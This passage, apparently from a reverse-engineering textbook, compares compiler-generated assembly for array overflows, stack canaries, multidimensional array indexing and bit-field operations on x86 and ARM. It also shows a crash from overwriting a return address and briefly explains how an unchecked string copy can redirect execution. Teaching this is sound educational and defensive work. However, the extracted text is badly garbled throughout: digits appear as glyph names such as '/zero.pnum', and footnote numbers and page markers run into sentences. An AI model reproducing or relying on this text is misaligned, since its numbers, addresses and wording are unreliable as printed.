mov DWORD PTR _i$[ebp], eax
$LN3@main:
cmp DWORD PTR _i$[ebp], 30 ; 0000001eH
jge SHORT $LN1@main
mov ecx, DWORD PTR _i$[ebp]
mov edx, DWORD PTR _i$[ebp] ; that insruction is obviously redundant
mov DWORD PTR _a$[ebp+ecx*4], edx ; ECX could be used as second operand here instead
jmp SHORT $LN2@main
$LN1@main:
xor eax, eax
mov esp, ebp
pop ebp
ret 0
_main ENDP
Run compiled program and its crashing. No wonder. Let’s see, where exactly it’s crashing.
I’m not using debugger anymore, because I tired to run it each time, move mouse, etc, when I need just to spot
some register’s state at specific point. That’s why I wrote very minimalistic tool for myself, tracer /five.pnum./zero.pnum./one.pnum, which is
enough for my tasks.
I can also use it just to see, where debuggee is crashed. So let’s see:
generic tracer 0.4 (WIN32), http://conus.info/gt
New process: C:\PRJ\...\1.exe, PID=7988
EXCEPTION_ACCESS_VIOLATION: 0x15 (<symbol (0x15) is in unknown module>), ExceptionInformation[0]=8
EAX=0x00000000 EBX=0x7EFDE000 ECX=0x0000001D EDX=0x0000001D
ESI=0x00000000 EDI=0x00000000 EBP=0x00000014 ESP=0x0018FF48
EIP=0x00000015
FLAGS=PF ZF IF RF
PID=7988|Process exit, return code -1073740791
Now please keep your eyes on registers.
Exception occured at address /zero.pnumx/one.pnum/five.pnum. It’s not legal address for code — at least for win/three.pnum/two.pnum code! We trapped there
somehow against our will. It’s also interesting fact that EBPregister contain /zero.pnumx/one.pnum/four.pnum, ECXandEDX— /zero.pnumx/one.pnumD.
Let’s study stack layout more.
A/f_ter control flow was passed into main() ,EBPregister value was saved into stack. Then, /eight.pnum/four.pnum bytes was allo-
cated for array and ivariable. That’s (20+1)*sizeof(int) .ESPpointing now to _ivariable in local stack and
a/f_ter execution of next PUSH something ,something will be appeared next to _i.
That’s stack layout while control is inside main() :
ESP /four.pnum bytes for i
ESP+4 /eight.pnum/zero.pnum bytes for a[20] array
ESP+84 savedEBPvalue
ESP+88 returning address
Instruction a[19]=something writes last intin array bounds (in bounds yet!)
Instruction a[20]=something writes something to the place where EBPvalue is saved.
Please take a look at registers state at the crash moment. In our case, number /two.pnum/zero.pnum was written to /two.pnum/zero.pnumth element.
By the function ending, function epilogue restore EBPvalue. (/two.pnum/zero.pnum in decimal system is /zero.pnumx/one.pnum/four.pnum in hexadecimal). Then,
RETinstruction was executed, which is equivalent to POP EIP instruction.
RETinstruction taking returning adddress from stack (that’s address in some CRT/seven.pnum/four.pnum-function, which was called
main() ), and /two.pnum/one.pnum was stored there (/zero.pnumx/one.pnum/five.pnum in hexadecimal). The CPU trapped at the address /zero.pnumx/one.pnum/five.pnum, but there are no
executable code, so exception was raised.
Welcome! It’s called buffer overflow/seven.pnum/five.pnum.
/seven.pnum/four.pnumC Run-Time
/seven.pnum/five.pnumhttp://en.wikipedia.org/wiki/Stack_buffer_overflow
/seven.pnum/five.pnum
Replace intarray by string ( char array), create a long string deliberately, pass it to the program, to the function
which is not checking string length and copies it to short buffer, and you’ll able to point to a program an address
to which it should jump. Not that simple in reality, but that’s how it was emerged/seven.pnum/six.pnum.
Let’s try the same code in GCC /four.pnum./four.pnum./one.pnum. We got:
public main
main proc near
a = dword ptr -54h
i = dword ptr -4
push ebp
mov ebp, esp
sub esp, 60h
mov [ebp+i], 0
jmp short loc_80483D1
loc_80483C3:
mov eax, [ebp+i]
mov edx, [ebp+i]
mov [ebp+eax*4+a], edx
add [ebp+i], 1
loc_80483D1:
cmp [ebp+i], 1Dh
jle short loc_80483C3
mov eax, 0
leave
retn
main endp
Running this in Linux will produce: Segmentation fault .
If we run this in GDB debugger, we getting this:
(gdb) r
Starting program: /home/dennis/RE/1
Program received signal SIGSEGV, Segmentation fault.
0x00000016 in ?? ()
(gdb) info registers
eax 0x0 0
ecx 0xd2f96388 -755407992
edx 0x1d 29
ebx 0x26eff4 2551796
esp 0xbffff4b0 0xbffff4b0
ebp 0x15 0x15
esi 0x0 0
edi 0x0 0
eip 0x16 0x16
eflags 0x10202 [ IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)
Register values are slightly different then in win/three.pnum/two.pnum example, that’s because stack layout is slightly different
too.
/one.pnum./one.pnum/four.pnum./three.pnum Buffer overflow protection methods
There are several methods to protect against it, regardless of C/C++ programmers’ negligence. MSVC has options
like/seven.pnum/seven.pnum:
/seven.pnum/six.pnumClassic article about it: Smashing The Stack For Fun And Profit
/seven.pnum/seven.pnumWikipedia: compiler-side buffer overflow protection methods
/seven.pnum/six.pnum
/RTCs Stack Frame runtime checking
/GZ Enable stack checks (/RTCs)
One of the methods is to write random value among local variables to stack at function prologue and to check
it in function epilogue before function exiting. And if value is not the same, do not execute last instruction RET, but
halt (or hang). Process will hang, but that’s much better then remote attack to your host.
This random value is called “canary” sometimes, it’s related to miner’s canary/seven.pnum/eight.pnum, they were used by miners in
these days, in order to detect poisonous gases quickly. Canaries are very sensetive to mine gases, they become
very agitated in case of danger, or even dead.
If to compile our very simple array example /one.pnum./one.pnum/four.pnum./one.pnum in MSVC with RTC/one.pnum and RTCs option, you will see call to
@_RTC_CheckStackVars@8 function at the function end, checking “canary” correctness.
Optimizing Xcode (LLVM) + thumb-/two.pnum mode
Let’s back to our simple array example /one.pnum./one.pnum/four.pnum./one.pnum, again, now we can see how LLVM will check “canary” correctness:
_main
var_64 = -0x64
var_60 = -0x60
var_5C = -0x5C
var_58 = -0x58
var_54 = -0x54
var_50 = -0x50
var_4C = -0x4C
var_48 = -0x48
var_44 = -0x44
var_40 = -0x40
var_3C = -0x3C
var_38 = -0x38
var_34 = -0x34
var_30 = -0x30
var_2C = -0x2C
var_28 = -0x28
var_24 = -0x24
var_20 = -0x20
var_1C = -0x1C
var_18 = -0x18
canary = -0x14
var_10 = -0x10
PUSH {R4-R7,LR}
ADD R7, SP, #0xC
STR.W R8, [SP,#0xC+var_10]!
SUB SP, SP, #0x54
MOVW R0, #aObjc_methtype ; "objc_methtype"
MOVS R2, #0
MOVT.W R0, #0
MOVS R5, #0
ADD R0, PC
LDR.W R8, [R0]
LDR.W R0, [R8]
STR R0, [SP,#0x64+canary]
MOVS R0, #2
STR R2, [SP,#0x64+var_64]
STR R0, [SP,#0x64+var_60]
MOVS R0, #4
STR R0, [SP,#0x64+var_5C]
MOVS R0, #6
STR R0, [SP,#0x64+var_58]
MOVS R0, #8
STR R0, [SP,#0x64+var_54]
/seven.pnum/eight.pnumWikipedia: Miner’s canary
/seven.pnum/seven.pnum
MOVS R0, #0xA
STR R0, [SP,#0x64+var_50]
MOVS R0, #0xC
STR R0, [SP,#0x64+var_4C]
MOVS R0, #0xE
STR R0, [SP,#0x64+var_48]
MOVS R0, #0x10
STR R0, [SP,#0x64+var_44]
MOVS R0, #0x12
STR R0, [SP,#0x64+var_40]
MOVS R0, #0x14
STR R0, [SP,#0x64+var_3C]
MOVS R0, #0x16
STR R0, [SP,#0x64+var_38]
MOVS R0, #0x18
STR R0, [SP,#0x64+var_34]
MOVS R0, #0x1A
STR R0, [SP,#0x64+var_30]
MOVS R0, #0x1C
STR R0, [SP,#0x64+var_2C]
MOVS R0, #0x1E
STR R0, [SP,#0x64+var_28]
MOVS R0, #0x20
STR R0, [SP,#0x64+var_24]
MOVS R0, #0x22
STR R0, [SP,#0x64+var_20]
MOVS R0, #0x24
STR R0, [SP,#0x64+var_1C]
MOVS R0, #0x26
STR R0, [SP,#0x64+var_18]
MOV R4, 0xFDA ; "a[%d]=%d\n"
MOV R0, SP
ADDS R6, R0, #4
ADD R4, PC
B loc_2F1C
; second loop begin
loc_2F14
ADDS R0, R5, #1
LDR.W R2, [R6,R5,LSL#2]
MOV R5, R0
loc_2F1C
MOV R0, R4
MOV R1, R5
BLX _printf
CMP R5, #0x13
BNE loc_2F14
LDR.W R0, [R8]
LDR R1, [SP,#0x64+canary]
CMP R0, R1
ITTTT EQ ; canary still correct?
MOVEQ R0, #0
ADDEQ SP, SP, #0x54
LDREQ.W R8, [SP+0x64+var_64],#4
POPEQ {R4-R7,PC}
BLX ___stack_chk_fail
First of all, as we see, LLVM made loop “unrolled” and all values are written into array one-by-one, already
calculated, because LLVM conclued it will be faster. By the way, ARM mode instructions may help to do this even
faster, and finding this way could be your homework.
At the function end wee see “canaries” comparison — that laying in local stack and correct one, to which
R8register pointing. If they are equal to each other, /four.pnum-instruction block is triggered by “ITTTT EQ” , it is writ-
ing0intoR0, function epilogue and exit. If “canaries” are not equial, block will not be triggered, and jump to
/seven.pnum/eight.pnum
___stack_chk_fail function will be occured, which, as I suppose, will halt execution.
/one.pnum./one.pnum/four.pnum./four.pnum One more word about arrays
Now we understand, why it’s not possible to write something like that in C/C++ code/seven.pnum/nine.pnum:
void f(int size)
{
int a[size];
...
};
That’s just because compiler should know exact array size to allocate place for it in local stack layout or in data
segment (in case of global variable) on compiling stage.
If you need array of arbitrary size, allocate it by malloc() , then access allocated memory block as array of vari-
ables of type you need. Or use C/nine.pnum/nine.pnum standard feature [ISO/zero.pnum/seven.pnum, /six.pnum./seven.pnum./five.pnum./two.pnum], but it will be looks like alloca() /one.pnum./two.pnum./three.pnum internally.
/one.pnum./one.pnum/four.pnum./five.pnum Multidimensional arrays
Internally, multidimensional array is essentially the same thing as linear array.
Because computer memory in linear, it’s one-dimensional array. But this one-dimensional array can be easily
represented as multidimensional for handy usage.
For example, that’s how a[3][4] array elements will be placed in one-dimensional array of /one.pnum/two.pnum cells:
/zero.pnum/one.pnum/two.pnum /three.pnum
/four.pnum/five.pnum/six.pnum /seven.pnum
/eight.pnum/nine.pnum/one.pnum/zero.pnum /one.pnum/one.pnum
So, in order to address elements we need, first multiply first index by /four.pnum (matrix width) and then add second
index. That’s called row-major order , and this method of arrays and matrices representation is used in at least
in C/C++, Python. row-major order term in plain English language mean: “first, write elements of first row, then
second row ...and finally elements of last row” .
Another method of representation called column-major order (array indices used in reverse order) and it’s used
at least in FORTRAN, MATLAB, R. column-major order term in plain English language mean: “first, write elements
of first column, then second columnt ...and finally elements of last column” .
Same thing about multidimensional arrays.
Let’s see:
Listing /one.pnum./five.pnum/four.pnum: simple example
#include <stdio.h>
int a[10][20][30];
void insert(int x, int y, int z, int value)
{
a[x][y][z]=value;
};
x/eight.pnum/six.pnum
We got (MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum):
Listing /one.pnum./five.pnum/five.pnum: MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum
_DATA SEGMENT
COMM _a:DWORD:01770H
/seven.pnum/nine.pnumHowever, it’s possible in C/nine.pnum/nine.pnum standard [ISO/zero.pnum/seven.pnum, /six.pnum./seven.pnum./five.pnum./two.pnum]: GCC is actually do this by allocating array dynammically in stack (like al-
loca() /one.pnum./two.pnum./three.pnum)
/seven.pnum/nine.pnum
_DATA ENDS
PUBLIC _insert
_TEXT SEGMENT
_x$ = 8 ; size = 4
_y$ = 12 ; size = 4
_z$ = 16 ; size = 4
_value$ = 20 ; size = 4
_insert PROC
push ebp
mov ebp, esp
mov eax, DWORD PTR _x$[ebp]
imul eax, 2400 ; eax=600*4*x
mov ecx, DWORD PTR _y$[ebp]
imul ecx, 120 ; ecx=30*4*y
lea edx, DWORD PTR _a[eax+ecx] ; edx=a + 600*4*x + 30*4*y
mov eax, DWORD PTR _z$[ebp]
mov ecx, DWORD PTR _value$[ebp]
mov DWORD PTR [edx+eax*4], ecx ; *(edx+z*4)=value
pop ebp
ret 0
_insert ENDP
_TEXT ENDS
Nothing special. For index calculation, three input arguments are multiplying by formula address = 600·4·
x+ 30·4·y+ 4zto represent array as multidimensional. Do not forget that inttype is /three.pnum/two.pnum-bit (/four.pnum bytes), so all
coefficients should be multiplied by /four.pnum.
Listing /one.pnum./five.pnum/six.pnum: GCC /four.pnum./four.pnum./one.pnum
public insert
insert proc near
x = dword ptr 8
y = dword ptr 0Ch
z = dword ptr 10h
value = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+x]
mov eax, [ebp+y]
mov ecx, [ebp+z]
lea edx, [eax+eax] ; edx=y*2
mov eax, edx ; eax=y*2
shl eax, 4 ; eax=(y*2)<<4 = y*2*16 = y*32
sub eax, edx ; eax=y*32 - y*2=y*30
imul edx, ebx, 600 ; edx=x*600
add eax, edx ; eax=eax+edx=y*30 + x*600
lea edx, [eax+ecx] ; edx=y*30 + x*600 + z
mov eax, [ebp+value]
mov dword ptr ds:a[edx*4], eax ; *(a+edx*4)=value
pop ebx
pop ebp
retn
insert endp
GCC compiler does it differently. For one of operations calculating ( 30y), GCC produced a code without multi-
plication instruction. This is how it done: (y+y)≪4−(y+y) = (2 y)≪4−2y= 2·16·y−2y= 32y−2y= 30y.
Thus, for 30ycalculation, only one addition operation used, one bitwise shi/f_t operation and one subtraction op-
eration. That works faster.
ARM + Non-optimizing Xcode (LLVM) + thumb mode
/eight.pnum/zero.pnum
Listing /one.pnum./five.pnum/seven.pnum: Non-optimizing Xcode (LLVM) + thumb mode
_insert
value = -0x10
z = -0xC
y = -8
x = -4
SUB SP, SP, #0x10 ; allocate place in local stack for 4 int values
MOV R9, 0xFC2 ; a
ADD R9, PC
LDR.W R9, [R9]
STR R0, [SP,#0x10+x]
STR R1, [SP,#0x10+y]
STR R2, [SP,#0x10+z]
STR R3, [SP,#0x10+value]
LDR R0, [SP,#0x10+value]
LDR R1, [SP,#0x10+z]
LDR R2, [SP,#0x10+y]
LDR R3, [SP,#0x10+x]
MOV R12, 2400
MUL.W R3, R3, R12
ADD R3, R9
MOV R9, 120
MUL.W R2, R2, R9
ADD R2, R3
LSLS R1, R1, #2 ; R1=R1<<2
ADD R1, R2
STR R0, [R1] ; R1 - address of array element
ADD SP, SP, #0x10 ; deallocate place in local stack for 4 int values
BX LR
Non-optimizing LLVM saves all variables in local stack, however, it’s redundant. Address of array element is
calculated by formula we already figured out.
ARM + Optimizing Xcode (LLVM) + thumb mode
Listing /one.pnum./five.pnum/eight.pnum: Optimizing Xcode (LLVM) + thumb mode
_insert
MOVW R9, #0x10FC
MOV.W R12, #2400
MOVT.W R9, #0
RSB.W R1, R1, R1,LSL#4 ; R1 - y. R1=y<<4 - y = y*16 - y = y*15
ADD R9, PC ; R9 = pointer to a array
LDR.W R9, [R9]
MLA.W R0, R0, R12, R9 ; R0 - x, R12 - 2400, R9 - pointer to a. R0=x*2400 + ptr to a
ADD.W R0, R0, R1,LSL#3 ; R0 = R0+R1<<3 = R0+R1*8 = x*2400 + ptr to a + y*15*8 =
; ptr to a + y*30*4 + x*600*4
STR.W R3, [R0,R2,LSL#2] ; R2 - z, R3 - value. address=R0+z*4 =
; ptr to a + y*30*4 + x*600*4 + z*4
BX LR
Here is used tricks for replacing multiplication by shi/f_t, addition and subtraction we already considered.
Here we also see new instruction for us: RSB(Reverse Subtract ). It works just as SUB, but swapping operands
with each other. Why? SUB,RSB, are those instructions, to the second operand of which shi/f_t coefficient may be
applied: ( LSL#4 ). But this coefficient may be applied only to second operand. That’s fine for commutative opera-
tions like addition or multiplication, operands may be swapped there without result affecting. But subtraction is
non-commutative operation, so, for these cases, RSBexist.
“LDR.W R9, [R9]” works like LEA/two.pnum./one.pnum in x/eight.pnum/six.pnum, but here it does nothing, it’s redundant. Apparently, compiler
not optimized it.
/eight.pnum/one.pnum
/one.pnum./one.pnum/five.pnum Bit fields
A lot of functions defining input flags in arguments using bit fields. Of course, it could be substituted by bool-typed
variables set, but it’s not frugally.
/one.pnum./one.pnum/five.pnum./one.pnum Specific bit checking
x/eight.pnum/six.pnum
Win/three.pnum/two.pnum API example:
HANDLE fh;
fh=CreateFile ("file", GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL, NULL);
We got (MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum):
Listing /one.pnum./five.pnum/nine.pnum: MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum
push 0
push 128 ; 00000080H
push 4
push 0
push 1
push -1073741824 ; c0000000H
push OFFSET $SG78813
call DWORD PTR __imp__CreateFileA@28
mov DWORD PTR _fh$[ebp], eax
Let’s take a look into WinNT.h:
Listing /one.pnum./six.pnum/zero.pnum: WinNT.h
#define GENERIC_READ (0x80000000L)
#define GENERIC_WRITE (0x40000000L)
#define GENERIC_EXECUTE (0x20000000L)
#define GENERIC_ALL (0x10000000L)
Everything is clear, GENERIC_READ | GENERIC_WRITE = 0x80000000 | 0x40000000 = 0xC0000000 , and
that’s value is used as second argument for CreateFile()/eight.pnum/zero.pnumfunction.
HowCreateFile() will check flags?
Let’s take a look into KERNEL/three.pnum/two.pnum.DLL in Windows XP SP/three.pnum x/eight.pnum/six.pnum and we’ll find this fragment of code in the function
CreateFileW :
Listing /one.pnum./six.pnum/one.pnum: KERNEL/three.pnum/two.pnum.DLL (Windows XP SP/three.pnum x/eight.pnum/six.pnum)
.text:7C83D429 test byte ptr [ebp+dwDesiredAccess+3], 40h
.text:7C83D42D mov [ebp+var_8], 1
.text:7C83D434 jz short loc_7C83D417
.text:7C83D436 jmp loc_7C810817
Here we see TEST instruction, it takes, however, not the whole second argument, but only most significant
byte (ebp+dwDesiredAccess+3 ) and checks it for /zero.pnumx/four.pnum/zero.pnum flag (meaning GENERIC_WRITE flag here)
TEST is merely the same instruction as AND, but without result saving (recall the fact CMPinstruction is merely
the same as SUB, but without result saving /one.pnum./four.pnum./five.pnum).
This fragment of code logic is as follows:
if ((dwDesiredAccess&0x40000000) == 0) goto loc_7C83D417
IfANDinstruction leaving this bit, ZFflag will be cleared and JZconditional jump will not be triggered. Condi-
tional jump will be triggered only if 0x40000000 bit is absent in dwDesiredAccess variable — then ANDresult will
be0,ZFflag will be set and conditional jump is to be triggered.
Let’s try GCC /four.pnum./four.pnum./one.pnum and Linux:
/eight.pnum/zero.pnumMSDN: CreateFile function
/eight.pnum/two.pnum
#include <stdio.h>
#include <fcntl.h>
void main()
{
int handle;
handle=open ("file", O_RDWR | O_CREAT);
};
We got:
public main
main proc near
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
sub esp, 20h
mov [esp+20h+var_1C], 42h
mov [esp+20h+var_20], offset aFile ; "file"
call _open
mov [esp+20h+var_4], eax
leave
retn
main endp
[caption=GCC /four.pnum./four.pnum./one.pnum]
Let’s take a look into open() function in libc.so.6 library, but there is only syscall calling:
Listing /one.pnum./six.pnum/two.pnum: open() (libc.so./six.pnum)
.text:000BE69B mov edx, [esp+4+mode] ; mode
.text:000BE69F mov ecx, [esp+4+flags] ; flags
.text:000BE6A3 mov ebx, [esp+4+filename] ; filename
.text:000BE6A7 mov eax, 5
.text:000BE6AC int 80h ; LINUX - sys_open
So,open() bit fields apparently checked somewhere in Linux kernel.
Of course, it is easily to download both Glibc and Linux kernel source code, but we are interesting to understand
the matter without it.
So, as of Linux /two.pnum./six.pnum, when sys_open syscall is called, control eventually passed into do_sys_open kernel func-
tion. From there — to do_filp_open() function (this function located in kernel source tree in the file fs/namei.c ).
Important note. Aside from usual passing arguments via stack, there are also method to pass some of them via
registers. This is also called fastcall /two.pnum./five.pnum./three.pnum. This works faster, because CPU not needed to access a stack in memory
to read argument values. GCC has option regparm/eight.pnum/one.pnum, and it’s possible to set a number of arguments which might
be passed via registers.
Linux /two.pnum./six.pnum kernel compiled with -mregparm=3 option/eight.pnum/two.pnum /eight.pnum/three.pnum.
What it means to us, the first /three.pnum arguments will be passed via EAX,EDXandECXregisters, the other ones via
stack. Of course, if arguments number is less than /three.pnum, only part of registers will be used.
So, let’s download Linux Kernel /two.pnum./six.pnum./three.pnum/one.pnum, compile it in Ubuntu: make vmlinux , open it in IDA /five.pnum, find the do_filp_open()
function. At the beginning, we will see (comments are mine):
do_filp_open proc near
...
push ebp
/eight.pnum/one.pnumhttp://ohse.de/uwe/articles/gcc-attributes.html#func-regparm
/eight.pnum/two.pnumhttp://kernelnewbies.org/Linux_2_6_20#head-042c62f290834eb1fe0a1942bbf5bb9a4accbc8f
/eight.pnum/three.pnumSee also arch\x86\include\asm\calling.h file in kernel tree
/eight.pnum/three.pnum
mov ebp, esp
push edi
push esi
push ebx
mov ebx, ecx
add ebx, 1
sub esp, 98h
mov esi, [ebp+arg_4] ; acc_mode (5th arg)
test bl, 3
mov [ebp+var_80], eax ; dfd (1th arg)
mov [ebp+var_7C], edx ; pathname (2th arg)
mov [ebp+var_78], ecx ; open_flag (3th arg)
jnz short loc_C01EF684
mov ebx, ecx ; ebx <- open_flag
[caption=do_filp_open() (linux kernel /two.pnum./six.pnum./three.pnum/one.pnum)]
GCC saves first /three.pnum arguments values in local stack. Otherwise, if compiler would not touch these registers, it
would be too tight environment for compiler’s register allocator.
Let’s find this fragment of code:
loc_C01EF6B4: ; CODE XREF: do_filp_open+4F
test bl, 40h ; O_CREAT
jnz loc_C01EF810
mov edi, ebx
shr edi, 11h
xor edi, 1
and edi, 1
test ebx, 10000h
jz short loc_C01EF6D3
or edi, 2
[caption=do_filp_open() (linux kernel /two.pnum./six.pnum./three.pnum/one.pnum)]
0x40— is what O_CREAT macro equals to. open_flag checked for 0x40bit presence, and if this bit is 1, next
JNZinstruction is triggered.
ARM
O_CREAT bit is checked differently in Linux kernel /three.pnum./eight.pnum./zero.pnum.
Listing /one.pnum./six.pnum/three.pnum: linux kernel /three.pnum./eight.pnum./zero.pnum
struct file *do_filp_open(int dfd, struct filename *pathname,
const struct open_flags *op)
{
...
filp = path_openat(dfd, pathname, &nd, op, flags | LOOKUP_RCU);
...
}
static struct file *path_openat(int dfd, struct filename *pathname,
struct nameidata *nd, const struct open_flags *op, int flags)
{
...
error = do_last(nd, &path, file, op, &opened, pathname);
...
}
static int do_last(struct nameidata *nd, struct path *path,
struct file *file, const struct open_flags *op,
int *opened, struct filename *name)
{
...
if (!(open_flag & O_CREAT)) {
...
/eight.pnum/four.pnum
error = lookup_fast(nd, path, &inode);
...
} else {
...
error = complete_walk(nd);
}
...
}
Here is how kernel compiled for ARM mode looks like in IDA /five.pnum:
Listing /one.pnum./six.pnum/four.pnum: do_last() (vmlinux)
...
.text:C0169EA8 MOV R9, R3 ; R3 - (4th argument) open_flag
...
.text:C0169ED4 LDR R6, [R9] ; R6 - open_flag
...
.text:C0169F68 TST R6, #0x40 ; jumptable C0169F00 default case
.text:C0169F6C BNE loc_C016A128
.text:C0169F70 LDR R2, [R4,#0x10]
.text:C0169F74 ADD R12, R4, #8
.text:C0169F78 LDR R3, [R4,#0xC]
.text:C0169F7C MOV R0, R4
.text:C0169F80 STR R12, [R11,#var_50]
.text:C0169F84 LDRB R3, [R2,R3]
.text:C0169F88 MOV R2, R8
.text:C0169F8C CMP R3, #0
.text:C0169F90 ORRNE R1, R1, #3
.text:C0169F94 STRNE R1, [R4,#0x24]
.text:C0169F98 ANDS R3, R6, #0x200000
.text:C0169F9C MOV R1, R12
.text:C0169FA0 LDRNE R3, [R4,#0x24]
.text:C0169FA4 ANDNE R3, R3, #1
.text:C0169FA8 EORNE R3, R3, #1
.text:C0169FAC STR R3, [R11,#var_54]
.text:C0169FB0 SUB R3, R11, #-var_38
.text:C0169FB4 BL lookup_fast
...
.text:C016A128 loc_C016A128 ; CODE XREF: do_last.isra.14+DC
.text:C016A128 MOV R0, R4
.text:C016A12C BL complete_walk
...
TSTis analogical to TEST instruction in x/eight.pnum/six.pnum.
We can “spot” visually this code fragment by the fact that lookup_fast() will be executed in one case and
complete_walk() in another case. This is corresponding to do_last() function source code.
O_CREAT macro is equals to 0x40here too.
/one.pnum./one.pnum/five.pnum./two.pnum Specific bit setting/clearing
For example:
#define IS_SET(flag, bit) ((flag) & (bit))
#define SET_BIT(var, bit) ((var) |= (bit))
#define REMOVE_BIT(var, bit) ((var) &= ~(bit))
int f(int a)
{
int rt=a;
SET_BIT (rt, 0x4000);
REMOVE_BIT (rt, 0x200);
return rt;
};
/eight.pnum/five.pnum
x/eight.pnum/six.pnum
We got (MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum):
Listing /one.pnum./six.pnum/five.pnum: MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum
_rt$ = -4 ; size = 4
_a$ = 8 ; size = 4
_f PROC
push ebp
mov ebp, esp
push ecx
mov eax, DWORD PTR _a$[ebp]
mov DWORD PTR _rt$[ebp], eax
mov ecx, DWORD PTR _rt$[ebp]
or ecx, 16384 ; 00004000H
mov DWORD PTR _rt$[ebp], ecx
mov edx, DWORD PTR _rt$[ebp]
and edx, -513 ; fffffdffH
mov DWORD PTR _rt$[ebp], edx
mov eax, DWORD PTR _rt$[ebp]
mov esp, ebp
pop ebp
ret 0
_f ENDP
ORinstruction adding one more bit to value, ignoring others.
ANDresetting one bit. It can be said, ANDjust copies all bits except one. Indeed, in the second ANDoperand only
those bits are set, which are needed to be saved, except one bit we wouldn’t like to copy (which is 0in bitmask).
It’s easier way to memorize the logic.
If we compile it in MSVC with optimization turned on ( /Ox), the code will be even shorter:
Listing /one.pnum./six.pnum/six.pnum: Optimizing MSVC
_a$ = 8 ; size = 4
_f PROC
mov eax, DWORD PTR _a$[esp-4]
and eax, -513 ; fffffdffH
or eax, 16384 ; 00004000H
ret 0
_f ENDP
Let’s try GCC /four.pnum./four.pnum./one.pnum without optimization:
Listing /one.pnum./six.pnum/seven.pnum: Non-optimizing GCC
public f
f proc near
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
or [ebp+var_4], 4000h
and [ebp+var_4], 0FFFFFDFFh
mov eax, [ebp+var_4]
leave
retn
f endp
There are some redundant code present, however, it’s shorter then MSVC version without optimization.
Now let’s try GCC with optimization turned on -O3:
/eight.pnum/six.pnum
Listing /one.pnum./six.pnum/eight.pnum: Optimizing GCC
public f
f proc near
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
pop ebp
or ah, 40h
and ah, 0FDh
retn
f endp
That’s shorter. It is important to note that compiler works with EAXregister part via AHregister — that’s EAX
register part from /eight.pnumth to /one.pnum/five.pnumth bits inclusive.
Important note: /one.pnum/six.pnum-bit CPU /eight.pnum/zero.pnum/eight.pnum/six.pnum accumulator was named AXand consisted of two /eight.pnum-bit halves — AL(lower
byte) and AH(higher byte). In /eight.pnum/zero.pnum/three.pnum/eight.pnum/six.pnum almost all regsiters were extended to /three.pnum/two.pnum-bit, accumulator was named EAX, but
for the sake of compatibility, its older parts may be still accessed as AX/AH/ALregisters.
Because all x/eight.pnum/six.pnum CPUs are /one.pnum/six.pnum-bit /eight.pnum/zero.pnum/eight.pnum/six.pnum CPU successors, these older /one.pnum/six.pnum-bit opcodes are shorter than newer /three.pnum/two.pnum-bit
opcodes. That’s why “or ah, 40h” instruction occupying only /three.pnum bytes. It would be more logical way to emit here
“or eax, 04000h” , but that’s /five.pnum bytes, or even /six.pnum (if register in first operand is not EAX).
It would be even shorter if to turn on -O3optimization flag and also set regparm=3 .
Listing /one.pnum./six.pnum/nine.pnum: Optimizing GCC
public f
f proc near
push ebp
or ah, 40h
mov ebp, esp
and ah, 0FDh
pop ebp
retn
f endp
Indeed — first argument is already loaded into EAX, so it’s possible to work with it in-place. It’s worth noting
that both function prologue ( “push ebp / mov ebp,esp” ) and epilogue ( “pop ebp” ) can easily be omitted here,
but GCC probably isn’t good enough for such code size optimizations. However, such short functions are better to
beinlined functions/eight.pnum/four.pnum.
ARM + Optimizing Keil + ARM mode
Listing /one.pnum./seven.pnum/zero.pnum: Optimizing Keil + ARM mode
02 0C C0 E3 BIC R0, R0, #0x200
01 09 80 E3 ORR R0, R0, #0x4000
1E FF 2F E1 BX LR
BICis “logical and” , analogical to ANDin x/eight.pnum/six.pnum.ORRis “logical or” , analogical to ORin x/eight.pnum/six.pnum.
So far, so easy.
ARM + Optimizing Keil + thumb mode
Listing /one.pnum./seven.pnum/one.pnum: Optimizing Keil + thumb mode
01 21 89 03 MOVS R1, 0x4000
08 43 ORRS R0, R1
49 11 ASRS R1, R1, #5 ; generate 0x200 and place to R1
/eight.pnum/four.pnumhttp://en.wikipedia.org/wiki/Inline_function
/eight.pnum/seven.pnum
88 43 BICS R0, R1
70 47 BX LR
Apparently, Keil concludes that the code in thumb mode, making 0x200from 0x4000 , will be more compact
than code, writting 0x200to arbitrary register.
So that’s why, with the help of ASRS (arithmetic shi/f_t right), this value is calculating as 0x4000≫5.
ARM + Optimizing Xcode (LLVM) + ARM mode
Listing /one.pnum./seven.pnum/two.pnum: Optimizing Xcode (LLVM) + ARM mode
42 0C C0 E3 BIC R0, R0, #0x4200
01 09 80 E3 ORR R0, R0, #0x4000
1E FF 2F E1 BX LR
The code was generated by LLVM, in source code form, in fact, could be looks like:
REMOVE_BIT (rt, 0x4200);
SET_BIT (rt, 0x4000);
And it does exactly the same we need. But why 0x4200 ? Perhaps, that’s LLVM optimizer’s artifact/eight.pnum/five.pnum. Probably,
compiler’s optimizer error, but generated code works correct anyway.
More about compiler’s anomalies, read here /eight.pnum.
For thumb mode, Optimizing Xcode (LLVM) generates exactly the same code.
/one.pnum./one.pnum/five.pnum./three.pnum Shi/f_ts
Bit shi/f_ts in C/C++ are implemented via ≪and≫operators.
Here is a simple example of function, calculating number of 1bits in input variable:
#define IS_SET(flag, bit) ((flag) & (bit))
int f(unsigned int a)
{
int i;
int rt=0;
for (i=0; i<32; i++)
if (IS_SET (a, 1<<i))
rt++;
return rt;
};
In this loop, iteration count value icounting from 0to31,1≪istatement will be counting from 1to0x80000000 .
Describing this operation in natural language, we would say shi/f_t1by n bits le/f_t . In other words, 1≪istate-
